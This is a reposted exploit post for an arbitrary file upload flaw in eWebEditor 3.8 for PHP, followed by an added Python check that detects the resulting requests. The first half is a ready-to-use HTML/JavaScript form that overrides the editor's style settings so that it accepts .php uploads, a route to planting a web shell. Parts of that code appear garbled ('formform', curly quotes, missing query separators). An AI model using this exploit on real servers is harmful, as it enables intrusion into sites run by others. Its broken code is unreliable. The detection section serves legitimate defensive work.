eWebEditor (PHP version) Ver 3.8 arbitrary file upload 0day

2011-11-14 8:16:04 Source: reposted from the web
XML/HTML code
<title>eWebeditoR3.8 for php任意文件上EXP</title>  
  
<form action=”" method=post enctype=”multipart/form-data”>  
<INPUT TYPE=”hidden” name=”MAX_FILE_SIZE” value=”512000″>  
URL:<input type=text name=url value=”http://www.sitedirsec.com/ewebeditor/” size=100><br>  
<INPUT TYPE=”hidden” name=”aStyle[12]” value=”toby57|||gray|||red|||../uploadfile /|||55   
0|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|w   
av|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif   
|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0   
|||0|||||||||1|||0|||Office|||1|||zh- cn|||0|||500|||300|||0|||…|||FF00   
00|||12|||宋 体||||||0|||jpg|jpeg|||300|||FFFFFF|||1″>  
file:<input type=file name=”uploadfile”><br>  
<input type=button value=submit onclick=fsubmit()>  
</form><br>  
<script>  
function fsubmit(){   
form = document.forms[0];   
formform.action = form.url.value+”php/upload.php?action=savetype=FILEstyle=toby57language=en”;   
alert(form.action);   
form.submit();   
}   
</script> 
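
A detection check for the request shape the form above produces, as an added example that is not part of the original post: it flags multipart POSTs to upload.php that carry a client-supplied aStyle[...] field and reports whether its "|||"-separated extension lists include server-executable types. It assumes a normal editor upload does not send an aStyle field; the function names, the executable-extension set and the sample requests are constructed for illustration.

```python
import re
from email import message_from_bytes

# Assumption: extensions a PHP host would execute; adjust to the server's handler map.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "pht"}
STYLE_FIELD = re.compile(r"^aStyle(\[|$)", re.IGNORECASE)
BOUNDARY = "XBOUNDARYX"  # constructed boundary for the sample requests below

def multipart_fields(content_type, body):
    """Return [(field_name, filename, value_bytes)] from a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():
        return []
    return [(p.get_param("name", "", header="content-disposition"),
             p.get_filename(), p.get_payload(decode=True) or b"")
            for p in msg.get_payload()]

def inspect_upload(path, content_type, body):
    """Return a finding if an upload.php request carries its own style definition."""
    if not path.split("?", 1)[0].lower().endswith("/upload.php"):
        return None
    for name, _filename, value in multipart_fields(content_type, body):
        if STYLE_FIELD.match(name):
            tokens = value.decode("utf-8", "replace").split("|||")
            exts = {e.strip().lower() for t in tokens for e in t.split("|")}
            return {"field": name, "executable_exts": sorted(exts & EXECUTABLE_EXTS)}
    return None

def _form(parts):
    """Build a constructed multipart body from (name, filename, value) tuples."""
    out = b""
    for name, filename, value in parts:
        disp = f'form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"'
        out += f"--{BOUNDARY}\r\nContent-Disposition: {disp}\r\n\r\n".encode()
        out += value + b"\r\n"
    return out + f"--{BOUNDARY}--\r\n".encode()

# Constructed sample requests (not captured traffic).
SAMPLE_CT = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE_OVERRIDE = _form([
    ("aStyle[12]", None, b"demo|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg"),
    ("uploadfile", "note.txt", b"hello"),
])
SAMPLE_NORMAL = _form([("uploadfile", "photo.gif", b"GIF89a")])
```

A finding with a non-empty executable_exts list is the high-priority case; an aStyle field with only media extensions is still worth reviewing, since the request is supplying configuration that belongs on the server.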